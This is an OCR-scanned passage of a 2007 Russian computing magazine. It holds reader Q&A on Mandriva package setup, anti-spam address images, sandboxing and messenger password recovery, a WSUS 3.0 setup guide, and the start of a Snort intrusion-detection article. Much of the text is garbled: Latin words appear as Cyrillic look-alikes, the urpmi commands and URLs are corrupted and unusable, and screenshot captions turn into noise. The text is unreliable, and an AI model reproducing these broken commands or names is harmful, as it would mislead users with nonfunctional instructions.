сейчас и займемся. Прежде всего, для этого 
нужнозайти на официальный сайт приложе- 
ния и выбрать там вер сию уст ановлен ного 
у тебя дистрибутива (в твоем случае — 2007), 
а также архитектуру компьютера (если у тебя 
не 64-битная версия Мандривы, то оставь І586). 
Следующий шаг— выбор и стоя ни ков, откуда 
менеджер будет закачивать пакеты. Не замора- 
чивайся и просто все оставляй по умолчанию, 
после чего уже на следующем же шаге ты полу- 
чишь команды, необходимые для конфигурации 
менеджера: 

игрті . асісітесііа таіп ікр : / /тіггог . 
расіііс . пеС . аи/МапсігіѵаЬіпих/ 
об^ісіаІ/2007 . 0/і586/тесііа/таіп/ 
геіеазе тЕЬ. тесііа_іпбо/]т(і1ізЦ . сг 
игрті . асМтесІіа --ирМСе таіп_ 
ирсІаСез іСр: // ікр . Сидгаг . аС/тіггог/" 
тапсігаке/оііісіаІ/2 007 . 0/І586/ 
тесІіа/таіп/ирсІаЦез мікк тесііа_іпіо/ ~ 
Міізк . с 2 

игрті . аМтесііа --ирМке сопСгіЬ_ 
ирМкез ккр: //ккр. кидгаг . ак/тіггог/ 
тапс1гаке/оккісіа1/2 007 . 0/І586/ 
тесІіа/сопкгіЪ/ирсіакез мікк теМа_ 
іпко/МІізк . с 2 

Каждая строка — отдельная консольная 
команда, которую нужно выполнить с правами 
администратора (гооі’а). Если система не вы- 
дала ошибок (а выдавать их при таком подходе 
она не дол'жна),то можно сразу приступать к ис- 
пользованию менеджера пакетов. Консольная 
версия запускается командой игрті, а чтобы 
пол уч ить оправку, достаточно н абра ть команду: 

Мап игрті 

О: Как же меня достал спам! Не успе- 
ешь подписаться настоящим е-таіі- 
адресом, как он тут же попадает 
в спам-листы. Ящику всего только 
пару дней, а на него уже валится спам 
— где это видано? Что делать? 

А: Посмотрим на этот вопрос со стороны самих 
спамеров. Самый простой способ собрать спам- 
лист(базу е-таіВадресов, на которые будет осу=~ 
ществляться рекламная рассылка) — это пус- 
тить - в инета бота; который будет парсить самые - 
разнообразные страницы и извлекать из них 
е-таіі-адреса. И' если раньше помогала при- 
митивная Маскировка, типа изменения «зіерй 
дагтіеіапо . ги » н а «зіе рі зоЪака) датеіапег. пі», 
то сейчас такой фокус едва ли пройдет. Боты 



стали умнее, поэтому придется умнееі посту- 
пать и нам! Вспомни, какзащищаются самые 
разнообразные форумы ирнлайн-сервисы от 
автоматической регистрации. Чаще всего они 
используютзащиту с помощью динамическрй 
картинки, на которой так изображены цифры 
и буквы, что их сложно разобрать автоматичес- 
кой ОСР-системе и в тоже время легко человеку. 
Собственно, а кто мешает вместо обычной 
текстовой строки с е-таіі-адресом использо- 
ватькартинку, на которой он на-писан? Для этого 
даж^ есть специальный сервис ѵѵѵѵѵѵ.сегіаіпкеу. 
сот/сіетоз/тапдіетаіі -. Ко к тол ы<о вводишь 
свой е-таіі, получаешь картинку с изображени- 
ем-, а-такжетотовый тэг для вставки на страницы 
(например,І«<ітд 5гс="Ьіір://\ллл/ѵѵ.сегіаіпкеу. 
-сот/тт?П‘0">»). : Гут гла'вное, чтобы хозяева 
сервиса сами не были спамерами :). 




О: Работаем с младшим братом за 
одним компьютером. И знаете, даже 
при использовании ограниченной 
учетной записи он умудряется напор- 
тачить в системе. Как бы поместить 
его в некоторую оболочку, в которой 
он мог бы делать все что захочет 
и в тоже время не нарушал бы мое 
душевное равновесие? 

А: Лучше всего, конечно, обойтись стандарт- 
ными средствами винды. Можешь, например, 
создать для него одну единственную папку 
(с бинарниками нужных приложений, музы- 
кой, играми и т.д.) и ограничить ею доступ 
к файловой системе. Но в этом случае он будет 
чувствовать себя ущемленным и наверняка 
попытается тебе отомстить. А вот использова- 
ние продукта ѴѴі п Ла і і ( ѵѵѵѵѵѵ.ѵѵіпдиоІа.сотАл/) ) 
лишено подобного недостатка., В этом случа е 
твой братик будет за пускать все приложения 
в бедопаенрм окружении (так называемом 
запсІЬох’е) и они никакие повлияютна общую 
работу системы. Вместо лапки ему можно будет — 
сделать виртуальный жесткий диск и вообще 
предоставить ему.практически любую свободу 
без опаски за здоровье винды. 

О: Как восстановить забытый па- 
роль от интернет-мессенджера? 

А: Раньше бы я сказал, что всезависіитот 
конкретного приложения: для ІСО или Мігапба 
потребовалось бы одно приложение, но для 
вскрытия, например, ОоЬдІе Та'ік — совсем 
другое. Сейчас же могу тебе посоветовать один 
универсальный Ия струм ёМ к. М^ваепРазз 
( ѵѵѵѵѵѵ.пігзоіі.пеі/иііІз/тзразз.АітП выдаст па- 
роли почти что от всехустановленных в системе 
мессенджеров. То что нужно! И-С 
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Как запалить 
хакера 



Ловим взломщиков с помощью Впогі: 

Р05ТСКЕ$(ЗЬ 

или Мѵ$(2Ь? 

Грамотно ставим обе системы 

Польза и вред 
КАГО-массивов 



Рассказывает Крис Касперски 

Властелин 

обновлений 



ѴѴЗІІЗ: сервис централизованного управления 
обновлениями и исправлениями 





» ХАКЕР.РКО 



СЕРГЕЙ «ОВІШЕРІ» ЯРЕМЧУКІ 



ВЛАСТЕЛИН 

ОБНОВЛЕНИЙ 




ѴѴ51І5: СЕРВИС ЦЕНТРАЛИЗОВАННОГО УПРАВЛЕНИЯ ОБНОВЛЕНИЯМИ И ИСПРАВЛЕНИЯМИ 



Своевременная установка обновлений и исправлений является одним из факторов, обеспечивающих 
надежную защиту информационной системы. Индивидуальное обновление систем приведет к сущест- 
венному увеличению трафика и потребует большего внимания со стороны администратора. В 2002 году 
корпорация МісгозоГі: предложила бесплатный продукт для управления обновлениями — ВИЗ (Зоітѵѵаге 
Ирс1аі:е Зегѵісез), который сейчас заменен более мощным решением — ѴѴЗИЗ (ѴѴіпсІоѵѵз Зегѵег Ирсіаііе 
Зегѵісез). 



Как работает ѴѴ5 1)5 

лужба ѴѴЗІІЗ предназначена для централизо- 
ванного управления обновлениями и исправ- 
лениями продуктов МісгозоК: ѴѴіпсіоаѵз 2000 
ЗР4/ХР/2003/Ѵізі:а, (ЖісеХР/2003, ЕхсЬап^е 
Зегѵег, 3(2 Ь Зегѵег и других. По мере выхода 
новых продуктов этот список автоматически 
обновляется. Служба ѴѴЗІІЗ состоит из сер- 
верной и клиентской части. Серверная часть 
устанавливается внутри сети и подменяет 
собой МісгозоК ІІрбаСе, к которому подключа- 
ются клиенты за обновлениями при настройке 
по умолчанию. Такой подход предоставляет 
множество преимуществ. Так, все обновления 
скачиваются с сайта МісгозоН только один 
раз. Администратор может самостоятельно 
выбрать тип обновлений, остановившись, 
например, только на критических обновлениях 
безопасности и драйверах, а также указать 
язык. Причем теперь появилась возможность 
первоначально протестировать выбранные 
обновления на группе компьютеров и, убе- 
дившись, что все идет нормально, разрешить 
устанавливать их остальным. В разветвленных 
сетях можно использовать несколько сервисов 
ѴѴЗІІЗ, скачивать обновления через интернет 
будет только один из них. Для хранения описа- 
ний обновлений, конфигурации сервера ѴѴЗІІЗ 
и состояния обновлений клиентских систем 
используется база данных. Клиентом ѴѴЗІІЗ 
является служба АіЛотагіс ІІрсІаСез. 

На момент написания статьи была доступна 



версия ѴѴЗІІЗ 3.0 ЪеСа 2. Ее мы и будем дальше 
рассматривать, учитывая, что работает она ста- 
бильно, имеет дополнительные возможности 
и некоторые особенности по сравнению с пре- 
дыдущей версией 2.0, да и любая бета рано или 
поздно превращается в релиз. Установленный 
ѴѴЗІІЗ 2.0 легко обновляется до 3.0, при этом 
будут сохранены все предыдущие настройки, 
но если используется несколько серверов 
обновлений, то процесс модернизации должен 
начинаться с основного сервера. 

Подготовка перед установкой 

Перед началом установки ѴѴЗІІЗ необходимо 
убедиться, что компьютер и система удовлет- 
воряют некоторым требованиям, иначе эта 
процедура может затянуться. Так, для работы 
сервера обновлений, который будет обслужи- 
вать до 500 клиентов, необходим компьютер 
с процессором 1 Гц и 1 Гб оперативной памяти. 
Раздел, в который будет устанавливаться 
ѴѴЗІІЗ, должен быть отформатирован под 
файловую систему ШТЗ и иметь не менее 6 Гб 
свободного места, причем чем больше типов 
систем планируется обновить, тем больше 
требуется свободного пространства. Еще 1 Гб 
свободного места должен иметь системный 
раздел и 2 Гб — раздел, на котором установлен 
ѴѴіпсіоаѵз 3(2Ь Зегѵег 2005 ЕтЪесІсІесІ ЕбШоп (да- 
лее 3(2 Ь Зегѵег 2005 ЕЕ) . Операционная система 
должна быть ѴѴіпсіоаѵз Зегѵег 2003 ЗР1 или ѴізСа. 
Версия ѴѴЗІІЗ 2.0 поддерживала еще и 



ѴѴіпсіоаѵз 2000 ЗРЗ, но в 3.0 ее из списков 
зависимостей вычеркнули. В дальнейшем мы 
будет рассматривать установку применительно 
к 2003 ЗР1. Для установки ѴѴЗІІЗ необходимы 
следующие обязательные компоненты: 

1. МісгозоЕС ІпСегпеС Іп^огшаСіоп 
Зегѵісез (118) 6.0; 

2. Васкдгоипсі Іпкеііідепк Тгапзііег 
Зегѵісе (ВІТЗ) 2.0 (до.тісгозоіік . 
сот/^1іпк/?ЬіпкІБ=47251) ; 

3. Місгозо^к . ЫЕТ Егатеѵ\гогк 
Ѵегзіоп2.0 (до .шісгозо^к . сот/ 
^1іпк/?ЬіпкІБ=68935) ; 

4. Місгозоіік Керогк Ѵіеѵ/ег 2005 
(до .тісгозоИк . сот/ГѵгІіпк/ 
?ЬіпкІБ=70410) . 

В отличие от предыдущей версии, настраи- 
вавшейся через веб-интерфейс, третья версия 
использует уже ММС. И для его работы потре- 
буется МісгозоВ: Мапа^етепі: Сопзоіе 3.0 
Г ^о.тісгозоН.сот/Міпк/?ІлпкЮ - 70412) . 

Если в системе будет чего-то не хватать для 
корректной установки или работы ѴѴЗІІЗ, 
об этом будет сообщаться в виде подсказки. 

В качестве ЗС^Ь-сервера может использоваться 
уже названный 3(2Ь Зегѵег 2005 ЕЕ, который 
идет в комплекте ѴѴЗІІЗ, или 3(2 Ь Зегѵег 2005 
5Р1. Первый устанавливается и настраивается 
автоматически, поэтому нет причин от него 
отказываться. В качестве клиентских машин 
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> Одобрение обновления 



могут выступать ѴѴіпсіоѵѵб 2000 Рго/Зегѵег/ 
Абѵапсесі Зегѵег с ЗР4, ѴѴіпсіошб ХР Рго с ЗР1 
и выше и ѴѴіпсіоѵѵб Зегѵег 2003 всех версий. 
Если после установки возникнут проблемы 
с работой ѴѴЗІІЗ, следует проследить, что 
встроенная в ѴѴіпсіолѵб группа Иеі:ѵ\/огк Зегѵісе 
имеет: 

1. доступ для чтения (геаб) к каталогу, куда ус- 
тановлен ѴѴЗІІЗ, иначе не будет работать ВІТЗ; 

2. полный доступ (Риіі Сопітоі) к каталогу 
ѴѴЗІІЗ\ѴѴзи5Сопі:епі:, который так устанавли- 
вается по умолчанию, но другими сервиса- 
ми, отвечающими за безопасность, может 
сбрасываться; 

3. полный доступ к каталогам %шіпбіг%\Тетр 
и %Аѵіпбіг%\Місго50Й .ПЕТ\Егатеѵѵогк\ 

ѵі . 1 .4322\Тетрогагу АЗР.ИЕТ Еііез. 

Установку могут производить только члены 
локальной группы «Администраторы». 
Напомню, что ИЗ 6.0 уже идет в комплекте 
ѴѴіпсіоѵѵб Зегѵег 2003, но по умолчанию не ус- 
танавливается. Если это еще не сделано, зайди 
в «Установка и удаление программ -Э Установ- 
ка компонентов ѴѴіпсіоаѵз Арріісагіоп Зегѵег» 
и установи флажок напротив ИЗ. Теперь все 
готово к установке. 

Устанавливаем ѴѴ51І5 

Последняя версия ѴѴЗІІЗ 3.0 доступна по адресу 
^о.тісго5оВ:.сотЛЫіпк/?ЕіпкШ = 71058 ^ 
Запускаем полученный исполняемый файл 
ѴѴЗІІЗЗеШр.ехе. После анализа системы на 
предмет наличия всех зависимостей нам будет 
предложено принять лицензионное соглаше- 
ние. На следующем шаге Зеіесі: ІІрбащ Зоигсе 
определяется источник клиентских обнов- 
лений. Если выбрать «Зшге ирбагез Іосаііу», 
сервер ѴѴЗІІЗ 3.0 будет хранить обновления 
в указанном месте на локальном диске. 



В противном случае клиентские компьютеры 
будут каждый раз загружать одобренные обнов- 
ления с сайта МісгобоЙ. Трудно придумать 
логичное применение второго варианта в нор- 
мальных условиях, поэтому стоит остановиться 
на локальном хранении обновлений. 

Теперь переходим к выбору базы данных. 

По умолчанию предлагается использовать 
идущий в комплекте ЗС^Ь Зегѵег 2005 ЕЕ, вполне 
подойдет локальный или удаленный ЗС^Ь Зегѵег. 
Далее производится попытка подключения 
к выбранной базе данных, в случае «Зиссеззітіііу 
соппесщб» двигаемся дальше . 

На ѴѴеЪ ЗіИе Зеіесгіоп выбирается веб-узел, ко- 
торый будет использоваться ѴѴЗІІЗ. Рекоменду- 
ется задействовать имеющийся ИЗ, работаю- 
щий на 80-м порту, в качестве альтернативы 
предлагается создать отдельный веб-узел, 
работающий уже на порту 8530. Внизу мы 
видим ІІКЬ-адрес, к которому будут подклю- 
чаться клиентские компьютеры для загрузки 
обновлений, запоминаем его. 

После нажатия на «Иехі:» смотрим итоговую ин- 
формацию, и далее, собственно, осуществляет- 
ся установка всех компонентов ѴѴЗІІЗ. Выбрав 
по окончании флажок «ЬаипсЬ ѴѴЗІІЗ Зегѵег 
СопВ^игагіоп ѴѴігагб», мы ползшим возмож- 
ность запустить Сопй^игайоп ѴѴігагб, который 
поможет произвести первоначальные установ- 
ки. Не стоит упускать такую возможность, хотя 
при желании его всегда можно запустить из 
основного окна программы, зайдя в «Орйопз -> 
ѴѴЗІІЗ Зегѵег Сопй^игагіоп ѴѴігагб». 

Настройки в Сопйдигаііоп ѴѴііагб 

По умолчанию ѴѴЗІІЗ ползает обновления 
с веб-узла МктоБоГШрбаЩ напрямую. Но если 
в сети используется прокси-сервер или сервер 
ѴѴЗІІЗ прикрыт межсетевым экраном, тогда 




указать на первых шагах мастера. 

Кроме того, открой исходящие соединения по 
80 и 443 портам и определи источник обновле- 
ний. Это может быть один из сайтов МісгозоЙ 
или ранее настроенных серверов ѴѴЗІІЗ . 

В большинстве случаев во вкладке «СЬоозе 
ІІрзітеат Зегѵег» выбираем «МісгобоЙ ІІрбаЩ». 
А в «Зресііу Ргоху Зегѵег» — настройки прокси, 
если он есть. Для заполнения полей могут 
понадобиться его адрес, номер порта и данные 
аутентификации. Для дальнейших настроек 
необходимо сначала получить информацию 
о доступных типах обновлений, продуктах, 
для которых поддерживается обновление, и их 
языках. Процесс получения этой информации 
займет минут 15, поэтому нажимаем «Згагі: 
ЗупсЬгопігагіоп» и идем спокойно пить кофе. 
По окончании процесса станут доступны следу- 
ющие пункты и можно двигаться дальше. 
Первая остановка — «Сйоозе Ьап^иа^ез». Если 
не нужно обновлять системы с корейской, 
японской и прочими локализациями, выбира- 
ем «ПодѵпІоасІ ирбагез опіу іп біезе 1ап§иа§ез» 
и флажком отмечаем нужные языки. К сожале- 
нию, здесь, как и во второй версии, невозмож- 
но выбрать обновления конкретных видов 
продуктов в зависимости от языка интерфейса. 
Например, если у тебя только один компьютер 
с английским языком, то придется разбираться 
не только с обновлениями к этой системе, но 
и с остальными продуктами (офисом, операци- 
онными системами и пр.) . 

Продукты для обновлений указываются 
в «СЬоозе Ргобисі». Здесь просто отмечаем 
флажками, что необходимо обновлять, и пе- 
реходим к «СЬоозе СІаззШсагіопз», в котором 
доступны следующие классы обновлений: 
драйверы, критические обновления, нако- 
пительные пакеты обновлений, обновления 
определений, обновления системы безопас- 
ности, обновления, пакеты новых функций, 
пакеты обновлений и средства. К сожалению, 
никаких объяснений на счет назначения тех 
или иных функций не дано, и чтобы разобрать- 
ся с некоторыми позициями, придется сначала 
загрузить некоторые примеры. Здесь опять же 
нельзя гибко выставить классы в зависимости 
от операционных систем или приложений. 

В «Зеі Зуле Зсйебиіе» указываются парамет- 
ры синхронизации. Ее можно производить 
вручную, выбрав «ЗупсЬгопіге Мапиаііу», или 
автоматически по расписанию — «ЗупсЬгопіге 
АіЛотагісаІІу». В последнем случае необходимо 
в «Еігбі: Зупсіігопігайоп» указать время первой 
синхронизации и в «ЗупсЬгопігагіопрегбау» 

— число синхронизаций в день. 



ХАКЕР 02 /98/ 07 



/ 147 



» ХАКЕР.РКО 




Групгтомл политика 



№&«вл ДйДет* О**** 




■+ (К! И Я \9 



Ё ПйліТяі^ Тіжыъньй м*л*ат*| 

[=: 0 ГСг^Пра ш* р.іг™^л;лгрчі 
2 С^| К(ім6л>рач^я тиграет 

Б іІЦ Ядга*«7тічті^ім ш^ге 
5т О Сис«г* 

.-: Ш С*іЬ 

Ц] Г^нНТДО 

Э ^ К®-пе***тм »ъ**ч 

I Сй№ИСТіІ’ШС1Ь ПСя 

„] Піктатимобііт^ 
{Ц СйлгіѵІБДОкГ 
_і и*^йвФ0№#ііі 

| ГЪкИ^ХЫФ ШГ 

К ѢшрлЬ* т*р**м*№ 
_і Ирооодчт 
1і Ѵс?«ящзні^л 
_П ѴѴйгі&тР Ие**Н>** 
| УгфИМі+Ч '*і№- 

Ц№4**ІВД|Ккі 

^ У*л4гоЦЪй*« 

№ ,Ц Іг*ягкА ЁіркжЕТ 
_|№М№Й^Э 
| Щ»*рч*іт*ть ^ 

^ №4при>< й№«МНТБН 

^ Ш Хен6г*>р#ция тмгі?^ 
Е ы ^□н4ктурщгБ1 ВДккмк 

1* ^ Аш*»«іС1ГІ!Літ«№К ШІЙК 



ѴЛіІСІЕЭВД 4і|ЭсЫь! 



Настройка 

автомѳтѵгмеского 

ойіюолямя 

Отобразить с&^тва 

Требоа&ѵз: 

ѴУМсадз ^р.'ЕГ 2003, МР 
3>І Н 2000 ЗРЗ 

Отмене; 

УКазьезет, будет ди 
данньй к>мгък>тер 
получатъ обновлена 
сѵхтет бемпаснкти и 
доуп*й важные 
обнОВЛВ*®! с по™цью 
службы аетс**етичдасго 
обнеела-мя Ийпгі&ѵге, 



йетой№ 



± 



■>1 Но отѳ^м* ать пт^ір 'У*(«™іть йгалдич и ммршить- рійОТу* о шмг. .. Н* і 

Й* Н» щеір»и*тъ ічры»тр >синошп* «Фмлін-н и наериить ЩЙлу" я даыссг ... Но мдма 

. ■> Н^лс^рка мТйгити*ч:чето с6и-»^офи Нй эдыа 

Ноюммо 

-і РЮрЬшІъ КГтгіиТу ІДОМАтег*^ 

:%( Персик * 



Ш -Ц № ьъткгѵйтъ м-теыіітнкгй <г.\ 
ч*щм 

,«!І Рирыпгк. н*л#лл*тъ*а ут 
5адрим пчимп^мм г*н і 
ПвТвръИ ІШрК ДПч і 



Снйспз; Нкграйка а«трд»тнче«ога оАнвал^црл 



Этот параметр гймолжт 
указать, разрешаете* /и 
двтомэтмчестае 
обнжлн^ч; для Дамато 
кемгьютер з. Есш 
служба ьуючена, 

месбходцл^ эьйрятъ 
оді^ из четырех 
возможны* варчѣэктсе 
настроен фуппоесй 
поштмчи. 

у \ ^ц*^аі№й X Сть\ Л'Т-іі-мі / ~ 



Плоеніи Ойміміі*» 



Щ Н «гт*? КЧГП і -ВДДО о$*«-Ж**м 



0НЬз 

О0ТК“вЧ* 



Напрей*.-! л 

шш 



С&ЛрЬШ* ЛДОчіГрЫ иМбк'Шимы и При*»***. 
гпіЕкд ест* вы&щч едрнюп 4 
Уст^юо+ід по растжеліоа № 

І0-4 



У'ГТЛІССК і ПО раіГЫСЛбІгЗО ср№ 

І0300 



П вдрошокге л ѴММ да?. ХР *Р1 . дао *Р? 
I Преаыд^црм гг^а^етц ' ; СіХауои^ і^у^нтгр | 



І_ 



Отжлд I [ При^опь | 



> Настройка службы автоматического обновления 



И, наконец, последняя вкладка «РіпізЬ». 
Активация «Ьаипсіі гЪе ѴѴіпсіоѵѵз Зегѵег Орсіате 
Зегѵісез АсітіпізТгаТіоп Зпар-іп» после выхода из 
мастера запустит администраторскую консоль, 
а выбор «Ве§іп іппіаі зупсЬгопіхайоп» запустит 
первую синхронизацию. Но с «АбтіпізТгаТіоп 
Зпар-іп>> пока спешить не будем. 

Настройка параметров 

службы автоматического обновления 

Для возможности работы через ѴѴЗІІЗ клиен- 
тские компьютеры потребуют совместимую 
версию Ашотайс ІІрбаТез, поэтому при 
подключении каждой новой системы к серверу 
ѴУЗІІЗ на него будет установлена совместимая 
версия. Теперь приступаем к настройке службы 
автоматического обновления клиентских 
компьютеров. 

Оптимальный способ настройки, естественно, 
зависит от сетевого окружения. Если исполь- 
зуется служба каталогов Асгіѵе ОігесШгу, для 
настройки клиентов можно и нужно использо- 
вать объекты групповой политики (СРО) . При 
отсутствии такой службы следует использовать 
объекты локальной групповой политики. 

Но в любом случае требуется указать путь к 
серверу ѴУЗІІЗ для клиентского компьютера 



и настроить службу автоматического об- 
новления. Для этого необходимо выполнить 
следующие действия: загрузить администра- 
тивный шаблон, настроить автоматическое 
обновление, указать клиенту путь к серверу 
ѴѴЗІІЗ. Выбираем «Пуск -> Выполнить», наби- 
раем «§ресііі:.т5с». В появившемся редакторе 
политик открываем узел — «Конфигурация 
компьютера -> Административные шаблоны -> 
Компоненты ѴѴіпбоѵѵз -> ѴѴіпсІоѵѵз ІІрбаі:е». 

При отсутствии такого пункта необходимо 
добавить шаблон тіаи.асіт, для чего щелкни 
мышкой по заголовку «Административные шаб- 
лоны», в контекстном меню выбери команду 
«Добавление и удаление шаблонов», затем щел- 
кни на «Добавить» и укажи в списке на ѵѵиаи. 

Все параметры описаны достаточно хорошо, 
поэтому остановлюсь только на требую- 
щих первоначальной настройки. Первый 
параметр, к которому следует обратиться, 

— «Настройка автоматического обновле- 
ния». Он позволяет указать, разрешается 
ли автоматическое обновление для данного 
компьютера. После включения службы 
необходимо выбрать один из четырех воз- 
можных вариантов настройки групповой 
политики: 



1 . уведомлять перед загрузкой обновлений 
и уведомлять повторно перед их установкой 
— при наличии подходящих обновлений систе- 
ма информирует пользователя о необходимос- 
ти их загрузки, а затем и об установке; 

2. загружать обновления автоматически и уве- 
домлять, когда они готовы к установке — подхо- 
дящие обновления загружаются автоматически 
в фоновом режиме, а перед началом установки 
пользователю выводится сообщение; 

3. загружать обновления и устанавливать их по 
заданному ниже расписанию — выбираются дни 
и время, когда будет производиться принудитель- 
ная загрузка и установка обновлений, в случае 
необходимости перезагрузка будет выполнена 
автоматически (если это не отменено в «Не вы- 
полнять автоматический повторный запуск дтя 
автоматических установок обновлений») ; 

4. разрешать локальным администраторам 
выбирать режим настройки — в этом случае 
локальный администратор, используя «Панель 
управления -> Центр обеспечения безопасности 
-> Автоматическое обновление», сможет сам вы- 
бирать настройки автоматического обновления. 
Следующий пункт «Указать размещение 
службы обновлений МісгозоЙ: в интрасети», 
позволяет изменить политику, указывающую 
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> Пример отчета ѴѴ51І5 



на сервер в сети, на котором будет работать 
внутренняя служба обновлений. При задании 
этой политики требуется вбить два параметра: 
сервер, на котором клиентская программа 
будет искать обновления, и сервер, куда будет 
отправляться статистика. Можно назначить 
для обеих задач один и тот же сервер, указав его 
адрес в видейіТр://ѴѴ$ІІ$_5егѵег/. 

Основные настройки выполнены. Локальные 
политики вступают в силу немедленно, и при- 
мерно через 20 минут компьютер появится 
в списке Шаззі^песі СотріЛег. Политики на 
основе Асйѵе ПігесШгу обновляются приблизи- 
тельно каждые 90 минут. Ускорить этот процесс 
можно, введя в консоли на клиентском компью- 
тере команду ^рирбат /Гогсе и запустив поиск 
сервера ѴѴЗІІЗ вручную: ѵѵиаиск.ехе /сіегесгпохѵ. 

Создание групп 
компьютеров для обновления 

Если консоль управления ѴѴЗІІ5 еще не откры- 
та, выбираем «ѴѴіпсІолѵз Зегѵег ІІрбаіе Зегѵісез» 
в «Программы -> Администрирование». Важ- 
ной частью настройки работы ѴѴЗІІЗ является 
создание групп компьютеров. Группы компью- 
теров позволяют определить устанавливаемые 
обновления для однородных систем. Хорошим 
тоном является предварительное тестирование 
устанавливаемых обновлений на небольшой 
группе типичных (но не критичных) систем, 
а в случае нормального их функционирования 
в течение определенного промежутка времени, 
распространения и на остальные компьюте- 
ры. По умолчанию в списке присутствует две 
группы — А11 СотрШегз и ІІпаззі§песІ. Можно 
добавить любое количество групп, каких-либо 
ограничений не существует. 

Возможны два способа добавления компью- 
теров в группы ѴѴЗПЗ. Первый — установка 
имени группы в пункте «Разрешить клиенту 
присоединиться к целевой группе политик 
безопасности». По умолчанию используется 



второй более гибкий и удобный вариант. 
Изменить поведение сервера можно, перейдя 
в «Оргіопз -> СотрШегз». Положение пере- 
ключателя «ІІзе гііе Прсіагез Зегѵісе сопзоіе» 
свидетельствует об использовании именно 
этого варианта. Если переключить его в «ІІзе 
Сгоир Роіісу ог ге§ізі:гу зетп§ оп сотршегз», 
принадлежность к группам задается в реестре 
или в групповых политиках. 

Теперь переходим непосредственно к созданию 
групп. Это также просто. Щелкнув мышкой по 
«Сотршегз апб Сгоирз», выбираем в меню «Асій 
Сотріиег Сгоир» и в появившемся диалоговом 
окне вводим название группы. Тем временем 
в ІІпаззі^песІ начинают появляться компью- 
теры. Для перемещения компьютера в группу 
выделяем компьютер или группу компьютеров, 
затем в контекстном меню выбираем «СЬап^е 
МетЬегзЫр»и в появившемся списке — нуж- 
ную группу. Все. 

Обновление систем 

Теперь осталось только обновить выбранные сис- 
темы. Но сначала необходимо эти обновления 
загрузить, если это еще не сделано. Выбираем 
«Асгіоп -> ЗупсЬгопіге Ио\ѵ». Теперь в Прсіагез 
можно просмотреть доступные обновления. 

По умолчанию здесь несколько пунктов: АН 
Прбатз, СгійсаШрсІатз, Зесигкуіірсіатзи ѴѴЗІІЗ 
Ирбатз. Для быстрого поиска обновлений 
выбираем «Асгіоп -> ЗеагсЬ», после чего вводим 
необходимые критерии поиска. Чтобы не повто- 
рять эту процедуру каждый раз, выбираем «Иелѵ 
Іірсіат Ѵіеѵѵ» и формируем постоянный запрос 
к базе, который после нажатия на «ОК» будет 
виден в папке Іірсіат. Также обрати внимание 
на фильтры Арргоѵаі и Зтшз — используя их, 
можно быстро отобрать обновления еще по 
нескольким критериям. Нас сейчас интересуют 
АН Прсіатз, Арргоѵаі — Шарргоѵесі и ЗіаШз 
— Алу. Если щелкнуть по заголовку обновления, 
можно получить подробную информацию о его 



назначении: критичность, продукты, возмож- 
ность удаления обновления и необходимость 
принятия лицензионного соглашения, ссылку 
на страницу сайта Місгозой, содержащую более 
подробную информацию. 

В появившемся списке выбираем необходи- 
мые обновления поодиночке или удерживая 
клавишу «0x1». Затем в контекстном меню 
выбираем «Арргоѵе», появляется диалоговое 
окно Арргоѵе Нрсіаііез, в котором представлены 
группы компьютеров, для разрешения их уста- 
новки необходимо выбрать «Арргоѵе Ю Іпзтіі». 
Если же обновления, наоборот, нужно удалить, 
то поступаем аналогичным образом, только 
в меню выбираем уже «Арргоѵесі Гог Кетоѵаі». 
Чтобы получить отчет о произведенных обнов- 
лениях, приблизительно через сутки выбираем 
«Керогаз -> Іірсіат Зтшз Зшшпагу» и, указав 
критерии отбора, нажимаем «Кип КероП». 
Следует отметить, что отчеты являются одной 
из сильных сторон ѴѴЗІІЗ версии 3.0. 

Возможно и автоматическое одобрение обнов- 
лений. Для этого следует, выбрав компьютер, 
нажать на «Оргіопз» и на появившейся стра- 
нице — «АіИотагісАрргоѵаІз». Затем в зависи- 
мости от того, что требуется сделать, выбираем 
«Ие\ѵ Киіе» или «Іпзтіі АшоЭерІоутепі: Киіе» 
и нажимаем «Есік». В диалоговом окне опре- 
деляем параметры и указываем имя правила, 
автоматическая установка или одобрение 
выбирается в Абѵапсеб. 

Заключение 

Первоначальную настройку ѴѴЗІІ5 можно 
считать законченной. После произведенных 
действий сервер ѴѴЗІІЗ будет периодически 
получать обновления с МісгозоЙ ІІргіаіе, а кли- 
ентские компьютеры автоматически получать 
одобренные обновления. Но ѴѴЗІІЗ имеет еще 
много интересных функций и возможностей, 
таких, например, как формирование отчетов 
и отсылка е-таіі-сообщений. Успехов. □□ 
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ГО5 

НА СТРАЖЕ 
ПЕРИМЕТРА 



5КІ0КТ: МОЩНЫЙ ИНСТРУМЕНТ ОБНАРУЖЕНИЯ СЕТЕВЫХ АТАК 



Защита компьютерных сетей, как обычных, так и беспроводных, - тема острая и злобод- 
невная. Сегодня информацию с описаниями взломов, а также готовых программ, 
реализующих их, найти легко, и любой может испытать на тебе весь доступный 
арсенал. Чтобы обезопасить себя от неожиданных сюрпризов, следует реализовать 
защиту в комплексе: межсетевой экран, фильтрация МАС-адресов и шифрование 
трафика. Особое место в этом списке занимают системы обнаружения атак, своевре- 
менно сигнализирующие о появлении хакера. К таким средствам относится сетевая 
СОА Зпогі — мощный инструмент с открытым исходным кодом. 



Возможности Бпогі 

Зпогі; является сетевой системой обнаружения 
атак (ЮЗ) с открытым исходным кодом, кото- 
рая способна выполнить в реальном времени 
анализ ІР-пакетов, передаваемых на контро- 
лируемых интерфейсах. Зпогі; обнаруживает 
атаки, комбинируя два метода: сигнатурный 
и анализ протоколов. 

Всю собранную информацию детектор Зпогі; 
позволяет сохранить в файлах журналов, кото- 
рые могут иметь различный формат: обычный 
текстовый АЗ СП или бинарный, совместимый 
с ісрбитр. Кроме того, для удобства 
анализа информацию можно занести в базу 
данных: Ро51;§^е5^1, МуЗС^Ь, ипіхСЮВС и некото- 
рые другие. 

Система, построенная на Зпогі;, способна соби- 
рать и обрабатывать информацию с несколь- 
ких разнесенных датчиков. Все в дело в произ- 
водительности компьютеров, используемых 
в качестве сенсоров. Для того чтобы улучшить 
производительность, разделяя быструю работу 
ЮЗ по захвату пакетов и относительно медлен- 
ную по занесению информации, необходимо 
использовать ВагпуагП, который доступен на 
странице закачки проекта Зпогі;. В этом случае 
Зпогі; создает специальный двоичный выход- 
ной «унифицированный» формат, с которым 
в дальнейшем и работает ВагпуагП. 

Бпогіапсі ѴѴігеІезз 

Зпогі; непосредственно не умеет работать с бес- 
проводными сетями 802.1 1, но подключенный 



к такому устройству сможет интерпретировать 
полученную информацию. Сегодняшний Зпогі, 
в принципе, не делает различия в том, с каким 
типом сети он имеет дело, никаких специфи- 
